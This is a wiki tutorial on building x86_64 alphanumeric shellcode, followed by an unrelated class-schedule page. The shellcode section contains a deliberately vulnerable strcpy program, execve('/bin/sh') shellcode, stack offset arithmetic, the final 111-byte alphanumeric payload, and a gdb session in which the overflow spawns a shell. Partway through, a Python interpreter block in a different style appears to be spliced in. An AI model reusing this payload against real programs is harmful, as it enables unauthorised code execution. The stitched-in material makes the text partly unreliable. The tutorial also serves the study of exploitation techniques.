| 3*?<br />
|}<br />
<br />
The opcodes for '''%rax''', '''%rcx''', and '''%rdx''' are important and thus will be used frequently. When encountering multiple operands, the operand number is used in the notation for readability purposes.<br />
<br />
== The rbx, rsp, and rbp registers ==<br />
Identifying the ways to set the rest of the registers while investigating %rbx was not entirely fruitful. Full control over the %rbx register is not available, however, write access to its sub-registers is available:<br />
* %ebx<br />
* %bx<br />
* %bh<br />
* %bl<br />
<br />
Upon further investigation, this opened up access to multiple additional registers using:<br />
*Xor<br />
*Imul<br />
*Movslq<br />
<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
| <syntaxhighlight lang="asm">xor $0x[byte]({reg64}),{reg32}</syntaxhighlight><br />
| \x33\x??\x#1<br />
| 3*1<br />
|-<br />
| <source lang="asm">imul $0x[dword1],0x[byte2]({reg64}),{reg32}</source><br />
| \x69\x??\x#2\x#1\x#1\x#1\x#1<br />
| i*21111<br />
|-<br />
| <source lang="asm">imul $0x[byte1],0x[byte2]({reg64}), {reg32}</source><br />
| \x6b\x??\x#2\x#1<br />
| k*21<br />
|-<br />
| <source lang="asm">movslq 0x[byte1]({reg64}), {reg32}</source><br />
| \x63\x??\x#1<br />
| c*1<br />
|}<br />
<br />
To access the %ss segment, insert the prefix at the beginning of the instruction's bytecode (e.g. "63*?" instead of "3*?"). To use the special 64 bit registers instead, 0x41 or "A" is placed at the beginning of the bytecode. If both are required, the %ss segment prefix must always come first, e.g. '6A3*?'. With one of the 64 bit override prefixes (here 0x48, "H"), any of these instructions can be applied to a 32 bit register and treated as its 64 bit counterpart:<br />
<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
| <source lang="asm">imul $0x[byte1],0x[byte2]({reg64}),{reg64}</source><br />
| \x48\x6b\x??\x#2\x#1<br />
| Hk*21<br />
|}<br />
<br />
To set the value of %rbx directly, imul, xor, and movslq can be used. It's similar for other registers:<br />
* %rbp<br />
* %rsp<br />
<br />
==Xor==<br />
Left over are %rsp, %rbp, %rdi, and %rsi. Taking a closer look at xor, the opcodes from 0x30 through 0x35 give these valuable xor forms:<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x34<br />
| <syntaxhighlight lang="asm">xor $0x##, %al</syntaxhighlight><br />
|-<br />
| 0x35<br />
| <syntaxhighlight lang="asm">xor $0x########, %eax</syntaxhighlight><br />
|-<br />
| 0x48 0x35<br />
| <syntaxhighlight lang="asm">xor $0x########, %rax</syntaxhighlight><br />
|}<br />
<br />
'''0x30''' is a multi-byte xor instruction requiring at least two operands (even when only registers are named):<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x30<br />
| <syntaxhighlight lang="asm">xor %{16bit}, (%{64bit})</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, (%{64bit},%{64bit},1)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, (%{64bit},%{64bit},2)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[byte](%{64bit})</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[byte](,%{64bit},1)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[byte](,%{64bit},2)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[dword](%{64bit})</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[dword](,%{64bit},1)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[dword](,%{64bit},2)</syntaxhighlight><br />
|}<br />
<br />
'''0x31''' is as flexible as '''0x30'''. Not all permutations are included for brevity.<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x31<br />
| <syntaxhighlight lang="asm">xor %{32bit}, (%{64bit})</syntaxhighlight><br />
|}<br />
<br />
'''0x32''' is just as flexible, although the offsets will change source side rather than destination side. Not all permutations are included for brevity.<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x32<br />
| <syntaxhighlight lang="asm">xor (%{64bit}), %{16bit}</syntaxhighlight><br />
|}<br />
<br />
'''0x33''' is the opposite of 0x31 and as flexible. Not all permutations are included for brevity.<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x33<br />
| <syntaxhighlight lang="asm">xor (%{64bit}), %{32bit}</syntaxhighlight><br />
|}<br />
<br />
== The rsi and rdi registers ==<br />
<br />
Combine the knowledge of xor with the knowledge of the stack: whenever data is pushed, it is accessible at %ss:(%rsp). Knowing this, another register (e.g. %rcx) can hold that address and be used to set values on some of the more difficult registers:<br />
<br />
*%rbx<br />
*%rsp<br />
*%rbp<br />
*%rsi<br />
*%rdi<br />
<br />
First, utilise push and pop to simulate 'mov':<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rsp; \x54<br />
pop %rcx; \x59<br />
pop %rdx; \x5a (This just sets the pointer back)<br />
</syntaxhighlight>}}<br />
<br />
Two XOR parameters allow index registers to be set, %rsi and %rdi. For now, they will be zero'd out:<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rsi; \x56<br />
xor %ss:(%rcx), %rsi; \x36\x48\x33\x31<br />
pop %r8; \x41\x58 <br />
push %rdi; \x57<br />
xor %ss:(%rcx), %rdi; \x36\x48\x33\x39<br />
pop %r8<br />
</syntaxhighlight>}}<br />
<br />
Now %rsi and %rdi have been zero'd out. %r14 and %r15 special registers can also be pushed and zeroed out in this fashion. Now "full control" is gained over:<br />
<br />
*%rax<br />
*%rcx<br />
*%rdx<br />
*%rsi<br />
*%rdi<br />
*%r8<br />
*%r9<br />
*%r10<br />
*%r14<br />
*%r15<br />
<br />
So far, in this sample, full control has not been utilized over:<br />
<br />
*%rsp<br />
*%rbp<br />
*%rbx<br />
*%r11<br />
*%r12<br />
*%r13<br />
<br />
Similar to push, controllable data is required before a register can be set. Where pop is concerned, something may first have to be pushed to the stack; here only a zero register is required. Because of the way XOR works, once any register holds zero (%rax is used as the zero register here), it can be used to get %rbx, %rsp, and %rbp to zero if needed:<br />
<br />
To get %rbx:<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %ss:0x30(%rcx), %rax; store that value in rax<br />
xor %rax, %ss:0x30(%rcx); Null that area of stack<br />
imul $0x30,%ss:0x30(%rcx),%rbx; 0x30 * 0 = 0 (the slot nulled above)<br />
imul $0x30,%ss:0x30(%rcx),%rbp; 0x30 * 0 = 0<br />
</syntaxhighlight>}}<br />
<br />
Once the stack space, as well as the destination is set to zero, %rax, %rbp can effectively be mov(ed):<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %rax,%ss:0x30(%rcx); 36 48 31 41 30<br />
xor %ss:0x30(%rcx),%rbp; 36 48 33 69 30<br />
</syntaxhighlight>}}<br />
<br />
The closest thing to incrementing and decrementing is the ability to use the ins and outs instructions to add or subtract 1, 2, or 4 against the %rdi register. This still leaves no significant add or sub. Imul can be used with 16 and 8 bit registers to find division. If %rsi or %rdi are not in use, there is also a magic mov:<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
movslq %ss:0x30(%rcx), %rsi<br />
xor %rsi, %ss:0x30(%rsi)<br />
</syntaxhighlight>}}<br />
<br />
This can come in quite handy when chunking large pieces of data to 0.<br />
<br />
==Example: Zeroing Out x86_64 CPU Registers==<br />
<br />
First %rsp is pushed to the top of the stack and the pointer address is popped into %rcx; the third pop is to ensure that the pointer address matches what is now in %rcx.<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rsp<br />
pop %rcx<br />
pop %r8 <br />
</syntaxhighlight>}}<br />
<br />
The following push overwrites %ss:(%rcx) with the contents of %rsi, the xor zeros out %rsi by xoring itself, and %rsp is then set back to %rcx using pop. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rsi<br />
xor %ss:(%rcx), %rsi<br />
pop %r8<br />
</syntaxhighlight>}}<br />
<br />
Again using the same form, %ss:(%rcx) is overwritten, %rdi is zeroed out using xor, and %rsp is reset to %rcx. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rdi<br />
xor %ss:(%rcx), %rdi<br />
pop %r8<br />
</syntaxhighlight>}}<br />
<br />
Zeroing out RDX is much simpler.<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rdi<br />
pop %rdx<br />
</syntaxhighlight>}}<br />
<br />
The following push and pop set %rax to 0x30. %al is the lowest order 8 bit subregister of %rax. Since 0x30 resides in %al, the xor effectively zeroes out %rax.<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push $0x30<br />
pop %rax<br />
xor $0x30, %al<br />
</syntaxhighlight>}}<br />
<br />
For %rbx and %rbp we xor %ss:0x30(%rcx), which is first zeroed out, against each register and then xor the register against %ss:0x30(%rcx), which results in each register being zeroed out.<br />
<br />
Zero out the %ss:0x30(%rcx) stack segment.<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %ss:0x30(%rcx), %rax<br />
xor %rax, %ss:0x30(%rcx)<br />
</syntaxhighlight>}}<br />
<br />
xor %rbx into the stack segment and then xor it against rbx to zero. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %rbx, %ss:0x30(%rcx)<br />
xor %ss:0x30(%rcx), %rbx<br />
</syntaxhighlight>}}<br />
<br />
Rezero the stack segment with %rax. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rdx<br />
pop %rax<br />
xor %ss:0x30(%rcx), %rax<br />
xor %rax, %ss:0x30(%rcx)<br />
</syntaxhighlight>}}<br />
<br />
As before, xor %rbp into the stack segment and then xor it against rbp to zero. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %rbp, %ss:0x30(%rcx)<br />
xor %ss:0x30(%rcx), %rbp<br />
</syntaxhighlight>}}<br />
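To check the register accounting in "The rsi and rdi registers" and in the zeroing example above, here is an added Python example (not code from the original article) that interprets the push/pop/xor subset used there against constructed nonzero register values and a constructed stack. The interpreter is an assumed model: it tracks no flags, supports only the low-byte sub-registers al/cl/dl/bl and the [%ss:][disp](%base) addressing forms used above, and bounds-checks its small stack. Running the sequence shows which registers end up zero, that %rcx holds the original %rsp, that %rsp ends 8 bytes above %rcx after the extra pops, and that %rax ends up holding the old %rbx value rather than zero.<br />

```python
import re

MASK64 = (1 << 64) - 1
LOW8 = {"al": "rax", "cl": "rcx", "dl": "rdx", "bl": "rbx"}      # low-byte sub-registers modelled
MEM_RE = re.compile(r"^(?:%ss:)?(0x[0-9a-fA-F]+)?\((%\w+)\)$")   # [%ss:][disp](%base); no SIB forms
OPERAND_SPLIT = re.compile(r",(?![^(]*\))")                      # commas outside parentheses

# The sequence from "Example: Zeroing Out x86_64 CPU Registers", copied from the page.
ZEROING_SEQUENCE = """
push %rsp
pop %rcx
pop %r8
push %rsi
xor %ss:(%rcx), %rsi
pop %r8
push %rdi
xor %ss:(%rcx), %rdi
pop %r8
push %rdi
pop %rdx
push $0x30
pop %rax
xor $0x30, %al
xor %ss:0x30(%rcx), %rax
xor %rax, %ss:0x30(%rcx)
xor %rbx, %ss:0x30(%rcx)
xor %ss:0x30(%rcx), %rbx
push %rdx
pop %rax
xor %ss:0x30(%rcx), %rax
xor %rax, %ss:0x30(%rcx)
xor %rbp, %ss:0x30(%rcx)
xor %ss:0x30(%rcx), %rbp
"""


class AlnumMachine:
    """Assumed model of the push/pop/xor subset used in the walkthrough; not a full CPU."""

    def __init__(self, regs, stack_base=0x7fffffffe000, stack_size=0x100):
        self.regs = {f"r{n}": 0 for n in range(8, 16)}
        self.regs.update({r: 0 for r in ("rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi")})
        self.regs.update(regs)
        self.base = stack_base
        self.mem = bytearray(b"A" * stack_size)          # constructed stack contents ('A's, as after an overflow)
        self.regs["rsp"] = stack_base + stack_size // 4  # room below for pushes and above for 0x30 offsets

    def _check(self, addr, width):
        off = addr - self.base
        if not 0 <= off <= len(self.mem) - width:
            raise IndexError(f"access outside the modelled stack: {addr:#x}")
        return off

    def _rd(self, addr, width):
        off = self._check(addr, width)
        return int.from_bytes(self.mem[off:off + width], "little")

    def _wr(self, addr, val, width):
        off = self._check(addr, width)
        self.mem[off:off + width] = val.to_bytes(width, "little")

    def _width(self, op):
        return 1 if op.lstrip("%") in LOW8 else 8

    def _addr(self, op):
        m = MEM_RE.match(op)
        if not m:
            raise ValueError(f"unsupported operand {op!r}")
        return self.regs[m.group(2)[1:]] + int(m.group(1) or "0", 0)

    def _get(self, op, width):
        if op.startswith("$"):
            return int(op[1:], 0)
        if op.startswith("%") and "(" not in op:
            name = op[1:]
            return self.regs[LOW8[name]] & 0xff if name in LOW8 else self.regs[name]
        return self._rd(self._addr(op), width)

    def _set(self, op, val, width):
        if op.startswith("%") and "(" not in op:
            name = op[1:]
            if name in LOW8:                              # write only the low byte of the full register
                full = LOW8[name]
                self.regs[full] = (self.regs[full] & ~0xff) | (val & 0xff)
            else:
                self.regs[name] = val & MASK64
        else:
            self._wr(self._addr(op), val, width)

    def run(self, program):
        for line in program.splitlines():
            line = line.split("#")[0].split(";")[0].strip()
            if not line:
                continue
            mnem, _, rest = line.partition(" ")
            ops = [o.strip() for o in OPERAND_SPLIT.split(rest)]
            if mnem == "push":
                val = self._get(ops[0], 8)                # push %rsp stores the pre-decrement value
                self.regs["rsp"] -= 8
                self._wr(self.regs["rsp"], val, 8)
            elif mnem == "pop":
                val = self._rd(self.regs["rsp"], 8)
                self.regs["rsp"] += 8
                self._set(ops[0], val, 8)
            elif mnem == "xor":
                src, dst = ops
                width = self._width(dst) if "(" not in dst else self._width(src)
                self._set(dst, self._get(src, width) ^ self._get(dst, width), width)
            else:
                raise ValueError(f"unsupported instruction {mnem!r}")
        return self.regs


def zeroing_demo():
    """Run the page's zeroing sequence from constructed nonzero state; return (final regs, initial rsp)."""
    start = {"rax": 0x1111111111111111, "rbx": 0x2222222222222222, "rdx": 0x3333333333333333,
             "rbp": 0x4444444444444444, "rsi": 0x5555555555555555, "rdi": 0x6666666666666666}
    machine = AlnumMachine(start)
    rsp0 = machine.regs["rsp"]
    return machine.run(ZEROING_SEQUENCE), rsp0


if __name__ == "__main__":
    regs, rsp0 = zeroing_demo()
    for name in ("rax", "rbx", "rcx", "rdx", "rbp", "rsi", "rdi", "rsp"):
        print(f"{name} = {regs[name]:#018x}")
```

Any step that would read or write outside the modelled stack raises IndexError, which is the same condition that makes such a sequence segfault when the (%rcx) slot no longer lies inside the mapped stack.<br />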
<br />
= 64 bit shellcode: Conversion to alphanumeric code =<br />
* Because of the limited instruction set, the conversion requires many '''mov emulations''' via '''xor''', '''mul''', '''movslq''', '''push''', and '''pop'''.<br />
== bof.c ==<br />
{{info|This is a modified version of bof.c to allow for 200 bytes because the length of the final shellcode exceeds 100 bytes.}}<br />
{{code|text=<source lang="c"><br />
#include <stdlib.h><br />
#include <stdio.h><br />
#include <string.h><br />
<br />
int main(int argc, char *argv[]){<br />
char buffer[200];<br />
strcpy(buffer, argv[1]);<br />
return 0;<br />
}<br />
</source>}}<br />
<br />
== Starting shellcode (64-bit execve /bin/sh) ==<br />
{{info|This was converted to shellcode from the example in 64 bit linux assembly}}<br />
* execve('/bin/sh');<br />
{{code|text=<source lang="asm"><br />
.section .data<br />
.section .text<br />
.globl _start<br />
_start:<br />
<br />
# a function is f(%rdi, %rsi, %rdx, %rcx, %r8, %r9).<br />
# Use zeroed memory to zero out %rsi, %rdi, %rdx<br />
xor %rdi, %rdi<br />
push %rdi<br />
push %rdi<br />
pop %rsi<br />
pop %rdx<br />
<br />
# Store '/bin/sh\0' in %rdi<br />
movq $0x68732f6e69622f6a, %rdi<br />
shr $0x8,%rdi<br />
push %rdi<br />
push %rsp<br />
pop %rdi<br />
push $0x3b<br />
pop %rax<br />
syscall # execve('/bin/sh', null, null)<br />
# function no. is 59/0x3b - execve()<br />
</source>}}<br />
<br />
* execve('/bin/sh') <br />
"\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"<br />
<br />
== Shellcode Analysis ==<br />
'''Immediately before the syscall:'''<br />
* %rax is set to 0x3b<br />
* %rdi is a pointer to '/bin/sh\0'<br />
* %rsi and %rdx are null<br />
To reproduce this, because the syscall instruction's own bytes are not alphanumeric, it must be written as data to a location that will eventually be executed ahead of the currently executing code. The '''xor''' and '''imul''' instructions can then be used to set values on registers.<br />
<br />
==Stack Analysis==<br />
{{info|These buffer dumps have been shortened for brevity and readability.}}<br />
[root@ares bha]# gdb -q ./bof<br />
Reading symbols from /home/hatter/bha/bof...(no debugging symbols found)...done.<br />
(gdb) r $(perl -e 'print "A"x232;')<br />
Starting program: /home/hatter/bha/bof $(perl -e 'print "A"x232;')<br />
Program received signal SIGSEGV, Segmentation fault.<br />
0x0000000000400525 in main ()<br />
(gdb) x/500x $rsp <br />
'''0x7fffffffe3c8''': 0x41414141 0x41414141 0x41414141 0x41414141<br />
0x7fffffffe3d8: 0xffffe400 0x00007fff 0x00000000 0x00000002<br />
..........................<br />
0x7fffffffe708: 0x2f656d6f 0x68726f76 0x2f736565 0x2f616862<br />
0x7fffffffe718: 0x00666f62 '''0x41414141 0x41414141 0x41414141'''<br />
0x7fffffffe728: '''0x41414141 0x41414141 0x41414141 0x41414141'''<br />
<br />
* The formula to determine the offset to begin overwriting data from the stack pointer is '''([[return address]] + [[shellcode]] length) - %rsp'''.<br />
{| class="wikitable"<br />
! Operation<br />
! Value<br />
! Comments<br />
|-<br />
| <br />
| 0x7fffffffe726<br />
| [[return address]]<br />
|-<br />
| '''+'''<br />
| 0x71<br />
| [[shellcode]] length (113 characters)<br />
|-<br />
| '''-'''<br />
| 0x7fffffffe3c8<br />
| %rsp<br />
|-<br />
| '''='''<br />
| '''0x3cf'''<br />
| '''Calculated offset from %rsp at time of overflow'''<br />
|}<br />
<br />
==The Offset==<br />
* To prepare for '''xor''' and '''imul''' manipulations, 0x5a is placed into %rax and %rsp is moved into %rcx.<br />
{{code|text=<source lang="asm"><br />
# Set %rcx as stack pointer <br />
# and align %rsp <br />
push $0x5a<br />
push %rsp<br />
pop %rcx<br />
pop %rax<br />
</source>}}<br />
* Preparing for imul, an '''xor''' is used to place 0x0f into %rax, then push %rax to the stack.<br />
{{code|text=<source lang="asm"><br />
# Get magic offset and store in %rdi<br />
xor $0x55, %al<br />
push %rax # 0x0f on the stack now.<br />
</source>}}<br />
<br />
* Because 0x41 * 0x0f = 0x3cf (975), the offset can be calculated in purely alphanumeric form. Modify this as code distances itself from the stack pointer during an exploit. The offset is stored in %rdi after setting back the stack pointer.<br />
{{code|text=<source lang="asm"><br />
pop %rax # add back to %esp<br />
imul $0x41, (%rcx), %edi # %rdi = 0x3cf, a "magic offset" for us<br />
</source>}}<br />
<br />
==The Syscall==<br />
* Now that the offset to an address in front of executing instructions has been obtained, 4 bytes must be nulled for the new instructions to be written:<br />
{{code|text=<source lang="asm"><br />
movslq (%rcx,%rdi,1), %rsi<br />
xor %esi, (%rcx,%rdi,1)<br />
</source>}}<br />
<br />
* This next xor comes out to 0x0000050f, which when moved onto the stack becomes 0x0f050000. 0x0f05 is the machine code for a '''syscall'''.<br />
{{code|text=<source lang="asm"><br />
push $0x3030474a<br />
pop %rax<br />
xor $0x30304245, %eax<br />
</source>}}<br />
<br />
* The %rax register now contains 0x050f. Put 0x0f050000 at (%rcx) - then set the stack pointer back.<br />
{{code|text=<source lang="asm"><br />
push %rax<br />
pop %rax # Garbage reg<br />
</source>}}<br />
<br />
* A '''mov emulation''' is used to mov 0x0f05 from (%rcx) to %rcx + %rdi through the %rsi register, writing the syscall instructions:<br />
{{code|text=<source lang="asm"><br />
movslq (%rcx), %rsi<br />
xor %esi, (%rcx,%rdi,1)<br />
</source>}}<br />
<br />
==Arguments==<br />
===Stack Space===<br />
* Zero out a '''qword''' of data starting at %rcx + 0x30 (48 in decimal)<br />
{{code|text=<source lang="asm"><br />
# Allocate stack space<br />
movslq 0x30(%rcx), %rsi<br />
xor %esi, 0x30(%rcx)<br />
movslq 0x34(%rcx), %rsi<br />
xor %esi, 0x34(%rcx)<br />
</source>}}<br />
<br />
===Register Initialization===<br />
* The %rdx, %rdi, and %rsi registers are used for the '''execve()''' syscall. These are zeroed out to initialize their values using the stack space previously allocated.<br />
{{code|text=<source lang="asm"><br />
# Zero rdx, rsi, and rdi<br />
movslq 0x30(%rcx), %rdi<br />
movslq 0x30(%rcx), %rsi<br />
push %rdi<br />
pop %rdx<br />
</source>}}<br />
<br />
===String Argument===<br />
* '''/bin''' is placed onto the stack at the space allocated at %rcx + 0x30.<br />
{{code|text=<source lang="asm"><br />
push $0x5a58555a<br />
pop %rax<br />
xor $0x34313775, %eax<br />
xor %eax, 0x30(%rcx)<br />
</source>}}<br />
* '''/sh\0''' is placed onto the stack at the space allocated at %rcx + 0x34.<br />
{{code|text=<source lang="asm"><br />
push $0x6a51475a<br />
pop %rax<br />
xor $0x6a393475, %eax<br />
xor %eax, 0x34(%rcx) <br />
</source>}}<br />
* '''xor''' is used as a '''mov emulation''' to place '/bin/sh\0' into %rdi.<br />
{{code|text=<source lang="asm"><br />
xor 0x30(%rcx), %rdi<br />
</source>}}<br />
* Set the stack pointer back so %rsp = %rcx + 8 so that the push of %rdi does not overwrite (%rcx). Push '/bin/sh\0'.<br />
{{code|text=<source lang="asm"><br />
pop %rax<br />
push %rdi<br />
</source>}}<br />
<br />
===Final Registers===<br />
* %rsi and %rdx are '''0'''. First, push a byte to meet the sign requirement for '''movslq''', then zero %rdi.<br />
{{code|text=<source lang="asm"><br />
push $0x58<br />
movslq (%rcx), %rdi<br />
xor (%rcx), %rdi <br />
</source>}}<br />
* Align %rsp and %rcx, then use a mov emulation to place %rsp into %rdi. %rdi then contains a pointer to '/bin/sh\0'.<br />
{{code|text=<source lang="asm"><br />
pop %rax<br />
push %rsp<br />
xor (%rcx), %rdi<br />
</source>}}<br />
* %rax is set to 59 or '''0x3b''' for the '''execve()''' syscall.<br />
{{code|text=<source lang="asm"><br />
xor $0x63, %al<br />
</source>}}<br />
'''Final registers:'''<br />
* %rax = 0x3b<br />
* %rdi = pointer to '/bin/sh\0'<br />
* %rsi = null<br />
* %rdx = null<br />
<br />
==Final Code==<br />
* x86_64 alphanumeric execve('/bin/sh',null,null) - 111 bytes:<br />
'''jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394c'''<br />
{{info|Some assemblers prefer the '#' character to the ';' character for comments. User may have to find and replace to get it to assemble properly.}}{{code|text=<source lang="asm"><br />
.global _start<br />
.text<br />
_start:<br />
; Set %rcx as stack pointer <br />
; and align %rsp <br />
push $0x5a<br />
push %rsp<br />
pop %rcx<br />
pop %rax<br />
<br />
; Get magic offset and store in %rdi<br />
xor $0x55, %al<br />
push %rax ; 0x0f on the stack now.<br />
pop %rax ; add back to %esp<br />
imul $0x41, (%rcx), %edi ; %rdi = 0x3cf, a "magic offset" for us<br />
; This is decimal value 975.<br />
; If this is too low/high, suggest a <br />
; modification to xor of %al for <br />
; changing the imul results<br />
<br />
; Write the syscall <br />
movslq (%rcx,%rdi,1), %rsi<br />
xor %esi, (%rcx,%rdi,1) ; 4 bytes have been nulled<br />
push $0x3030474a<br />
pop %rax<br />
xor $0x30304245, %eax<br />
push %rax<br />
pop %rax ; Garbage reg<br />
movslq (%rcx), %rsi<br />
xor %esi, (%rcx,%rdi,1)<br />
<br />
; Syscall written, set values now.<br />
; allocate 8 bytes for '/bin/sh\0'<br />
movslq 0x30(%rcx), %rsi<br />
xor %esi, 0x30(%rcx)<br />
movslq 0x34(%rcx), %rsi<br />
xor %esi, 0x34(%rcx)<br />
<br />
; Zero rdx, rsi, and rdi<br />
movslq 0x30(%rcx), %rdi<br />
movslq 0x30(%rcx), %rsi<br />
push %rdi<br />
pop %rdx<br />
<br />
; Store '/bin/sh\0' in %rdi<br />
push $0x5a58555a<br />
pop %rax<br />
xor $0x34313775, %eax<br />
xor %eax, 0x30(%rcx) ; '/bin' just went onto the stack<br />
<br />
push $0x6a51475a<br />
pop %rax<br />
xor $0x6a393475, %eax<br />
xor %eax, 0x34(%rcx) ; '/sh\0' just went onto the stack<br />
xor 0x30(%rcx), %rdi ; %rdi now contains '/bin/sh\0'<br />
<br />
<br />
pop %rax<br />
push %rdi<br />
<br />
push $0x58<br />
movslq (%rcx), %rdi<br />
xor (%rcx), %rdi ; %rdi zeroed<br />
pop %rax<br />
push %rsp<br />
xor (%rcx), %rdi<br />
xor $0x63, %al</source>}}<br />
<br />
== Successful Overflow Test ==<br />
{{info|This [[shellcode]] was tested on a modified [[Buffer_Overflows#bof.c|bof.c]] with the buffer enlarged to 200 bytes instead of 100 bytes, as the shellcode here exceeds the original buffer size.}}<br />
<br />
[user@host bha]# gdb -q ./bof<br />
Reading symbols from /home/hatter/bha/bof...(no debugging symbols found)...done.<br />
(gdb) r `perl -e 'print "jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394c" . "Y"x105 . "\x26\xe7\xff\xff\xff\x7f";'`<br />
Starting program: /home/hatter/bha/bof `perl -e 'print "jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394c" . "Y"x105 .<br />
"\x26\xe7\xff\xff\xff\x7f";'`<br />
process 28444 is executing new program: /bin/bash<br />
[user@host bha]# uname -m<br />
x86_64<br />
[user@host bha]# exit<br />
exit<br />
[Inferior 1 (process 28444) exited normally]<br />
(gdb) <br />
{{exploitation}}{{programming}}{{social}}<br />
[[Category:Shellcode]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Current:Classes&diff=9034Current:Classes2012-09-17T17:43:57Z<p>DPYJulietowbaijc: /* Wednesday - 9/19 */</p>
<hr />
<div>{{info|<center>'''All class and panel times are in UTC-0. Join us in [[IRC]] for lectures and Q&A. (''[http://whattimeisit.com What time is it in UTC?]'')'''</center>}}<br />
<br />
{{social}}<br />
<br />
<br />
'''''Want to teach or participate in a panel?''''' <br />
<br />
:* Make a wiki account<br />
:* Put a link to your user page and topic in the desired time slot.<br />
::* Do not feel constrained to hour-long time blocks; you may use increments of less than one hour.<br />
::* You may book more than one hour if you feel you need it, but please be conservative.<br />
:* '''Come to [[IRC]] during your scheduled course interval'''<br />
<br />
==Requests==<br />
<br />
Place any requests for classes in here, or even ideas for other speakers. Some people want to speak but don't know what to speak about.<br />
<br />
* Heap Overflows<br />
* Integer overflows/underflows<br />
* Null pointer dereference attacks<br />
* Reverse engineering<br />
* Applied cryptography<br />
* Linux distribution comparison/discussion<br />
* Android hardening<br />
<br />
==Monday - 9/17==<br />
<br />
'''00:00 - 01:00''' '''[http://pastebin.com/ZxhqH16C Log]''' ''What is [[SIM|security infrastructure]]?'' - '''[[User:Hatter|hatter]]'''<br />
'''01:00 - 02:00''' '''[http://pastebin.com/9udApQq9 Log]''' ''Introduction to [[Python]]'' - '''[[User:Z|Z]]'''<br />
'''02:00 - 03:00''' '''[http://pastebin.com/aVw7V8YF Log]''' ''Introduction to [[Nmap|network mapping]] Part 1'' - '''[[User:Foo|Foo]]'''<br />
'''03:00 - 04:00''' '''[http://pastebin.com/AXM4sghW Log]''' ''Anonymity Online (or How to be a Ghost)'' - '''[[User:Rorschach|rorschach]]'''<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Tuesday - 9/18==<br />
'''00:00 - 01:00''' ''Remote [[SQL injection]] testing'' - '''[[User:Hatter|hatter]]'''<br />
'''01:00 - 02:00''' ''Introduction to [[Python]] (cont.)'' - '''[[User:z|z]]'''<br />
'''02:00 - 03:00''' ''Introduction to [[Nmap|network mapping]] Part 2'' - '''[[User:Foo|Foo]]'''<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Wednesday - 9/19==<br />
'''00:00 - 01:00''' ''Introduction to Assembly Code'' - '''[[User:M4tr1c3s|m4]]'''<br />
'''01:00 - 02:00''' ''An introduction to the [[User:Hatter/ELF format|ELF Format]]'' - '''[[User:Hatter|hatter]]'''<br />
02:00<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
'''20:00 - 21:00''' ''Introduction to Ptrace'' -- '''[[User:Rorschach|rorschach]]'''<br />
